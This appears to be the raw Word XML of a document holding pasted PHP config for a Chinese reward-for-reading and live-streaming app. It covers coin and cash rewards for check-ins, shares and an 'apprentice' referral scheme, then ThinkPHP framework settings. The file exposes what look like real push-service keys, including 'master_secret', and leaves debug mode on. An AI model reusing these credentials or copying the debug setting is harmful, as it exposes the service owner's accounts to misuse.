        <w:t>&lt;span&gt;4</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&lt;/span&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>现金！</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399CEF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'baoxiang_tudi_1'</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'1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A644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'baoxiang_tudi_1_money'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09938C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'baoxiang_tudi_2'</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'10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C84F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'baoxiang_tudi_2_money'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'30',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E283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'baoxiang_tudi_3'</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'20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C9D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'baoxiang_tudi_3_money'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'50',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FC07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'baoxiang_tudi_4'</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'50',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBBB3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'baoxiang_tudi_4_money'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'200',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D95D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'baoxiang_tudi_5'</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'100',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E86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'baoxiang_tudi_5_money'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'500',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6819C9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'diaocha'           =&gt;'10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40422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'qiandao_1'</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'10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453075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'qiandao_2'</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'15',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F208C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'qiandao_3'</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'20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC38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'qiandao_4'</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'25',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECF1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'qiandao_5'</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'30',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B023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'qiandao_6'</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'35',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E372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'qiandao_7'</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=&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'40'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747053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43026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16409B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=&gt; 'http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479438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'prod_url' =&gt; 'http:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C5A2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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496A4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'dtitle' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E608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'logo' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28868C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=&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD71D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'description' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738FE2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'phone' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FD43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'qq' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C02C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=&gt; '1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318A0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'guanjianci' =&gt; 'BTC,ETH',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BABA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'copyright' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A090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ED53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52E2D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57851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=&gt; 'A6939467624361',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276C0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'appkey' =&gt; '50154B45-A563-E16C-6D62-3E563888C324',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756C0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'app_key' =&gt; '388d9d36ad6e4e7d18209111',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6A72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'master_secret' =&gt; '0753bfdfc5aaab3abb6704fa',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB6C2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'push_time' =&gt; '3',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774175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'redian' =&gt; '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2543A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 =&gt; '1',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30AA92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AC1D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190A6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w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>每名徒弟奖励</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>元了，马上收徒</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7DC7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'msg' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>徒弟每天阅读，都能向您进贡金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576183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'fenxiang_title' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享标题，后台自行修改内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530913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'fenxiang_content' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分享描述，后台</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>师徒邀请</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>奖励配置</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>后台自行修改内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3FF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'renwu' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>签到领金币、开宝箱</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165FB4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'duihuan' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>秒赚金币</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>100</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>倍</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70892A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'money_yaoqing' =&gt; '0.50',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593094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'money_yaoqing_s1' =&gt; '0.30',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B01D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'jinbi_yaoqing' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7794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'jinbi_yaoqing_s1' =&gt; '10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58883F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'money_login' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE6AB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'money_login_s1' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1544F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'jinbi_login' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1241BC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'jinbi_login_s1' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF3C9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'money_news_num' =&gt; '5',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6972F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'money_news_time' =&gt; 10000,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79EF4C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'money_news' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C537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'money_news_s1' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58ACC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'jinbi_news' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789790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'jinbi_news_s1' =&gt; '10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699379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'money_weitoutiao' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59AED2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'money_weitoutiao_s1' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CEB3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'jinbi_weitoutiao' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB89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'jinbi_weitoutiao_s1' =&gt; '10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9E6F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'money_fenxiang_1' =&gt; '0.20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481645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'money_fenxiang_1_s1' =&gt; '0.10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1964A2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'jinbi_fenxiang_1' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AB7B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'jinbi_fenxiang_1_s1' =&gt; '10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B7C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'money_fenxiang_2' =&gt; '0.20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D2D3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'money_fenxiang_2_s1' =&gt; '0.20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFFD2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'jinbi_fenxiang_2' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2D71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'jinbi_fenxiang_2_s1' =&gt; '10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4377C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'money_jindu_time' =&gt; '20',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AF5F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'money_jindu_num' =&gt; '200',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E02C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'jinbi_jindu_2' =&gt; '10',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A25A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'jinbi_jindu_2_s1' =&gt; '5',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A53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C40F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73052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'liwu_title' =&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>钻石</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29062F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'type_content' =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请选择合适自己的分类，精准的分类可以获得更多的展示机会。如果选择不正确的分类，将影响您后续直播间的展示机会</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D532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'content'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>欢迎来到直播间！速翔网络倡导绿色健康直播，不提倡未成年人进行充值。直播内容和评论严禁包含政治、低俗、色情等内容</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C6F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'input_text'=&gt;'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>跟大家聊聊呗</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509A52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B545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return [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1129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'app_namespace'          =&gt; 'app',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737D8A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'app_debug'              =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3239C8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'app_trace'              =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCD98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'app_status'             =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036674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'app_multi_module'       =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C828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'auto_bind_module'       =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067D64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'root_namespace'         =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139741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'extra_file_list'        =&gt; [THINK_PATH . 'helper' . EXT],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC823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'default_return_type'    =&gt; 'html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15076E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'default_ajax_return'    =&gt; 'json',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592D8F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'default_jsonp_handler'  =&gt; 'jsonpReturn',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ECEB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'var_jsonp_handler'      =&gt; 'callback',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730D0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'default_timezone'       =&gt; 'PRC',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56632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'lang_switch_on'         =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC8D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'default_filter'         =&gt; 'htmlspecialchars',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD4B1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'default_lang'           =&gt; 'zh-cn',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C98C2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'class_suffix'           =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6A5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'controller_suffix'      =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58BF2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'default_module'         =&gt; 'index',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B599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'deny_module_list'       =&gt; ['common'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D5DA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'default_controller'     =&gt; 'Index',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C338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'default_action'         =&gt; 'index',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F9196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'default_validate'       =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F508D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'empty_controller'       =&gt; 'Error',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5059F3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'action_suffix'          =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EC1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'controller_auto_search' =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D020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'var_pathinfo'           =&gt; 's',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0112C7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'pathinfo_fetch'         =&gt; ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="487411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'pathinfo_depr'          =&gt; '/',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E002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'url_html_suffix'        =&gt; 'html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57BB42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'url_common_param'       =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45F6E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'url_param_type'         =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6059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'url_route_on'           =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074734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'route_config_file'      =&gt; ['route'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B60E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'url_route_must'         =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505A3C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'url_domain_deploy'      =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C36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'url_domain_root'        =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524EFD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'url_convert'            =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B71B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'url_controller_layer'   =&gt; 'controller',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15071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'var_method'             =&gt; '_method',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BDBD3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'template'               =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B471B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'Think',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F308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'view_path'    =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A368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'view_suffix'  =&gt; 'html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE9B3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'view_depr'    =&gt; DS,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36918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'tpl_begin'    =&gt; '{',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0731F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'tpl_end'      =&gt; '}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D6C4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'taglib_begin' =&gt; '{',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014CD4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'taglib_end'   =&gt; '}',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B92FC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'taglib_pre_load'     =&gt;    'app\common\taglib\Fx', </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DB22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B681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'view_replace_str'       =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5193D6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'dispatch_success_tmpl'  =&gt; THINK_PATH . 'tpl' . DS . 'dispatch_jump.tpl',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FAB4B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'dispatch_error_tmpl'    =&gt; THINK_PATH . 'tpl' . DS . 'dispatch_jump.tpl',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5970E9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'exception_tmpl'         =&gt; THINK_PATH . 'tpl' . DS . 'think_exception.tpl',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBD84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'error_message'          =&gt; '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请联系</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>QQ</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>技术：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1424445608',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1091AD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'show_error_msg'         =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAD36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'exception_handle'       =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730016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'log'                    =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655E7F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'File',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755AC1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'path'  =&gt; LOG_PATH,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C040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'level' =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B80C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BB9B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'trace'                  =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66552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'Html',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B97D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E794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'sql_explain'    =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61427B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'cache'                  =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E8B40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'File',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2896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'path'   =&gt; CACHE_PATH,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632066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'prefix' =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0694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'expire' =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="306AA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9CA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'session'                =&gt; [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3BD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=&gt; '',</w:t>
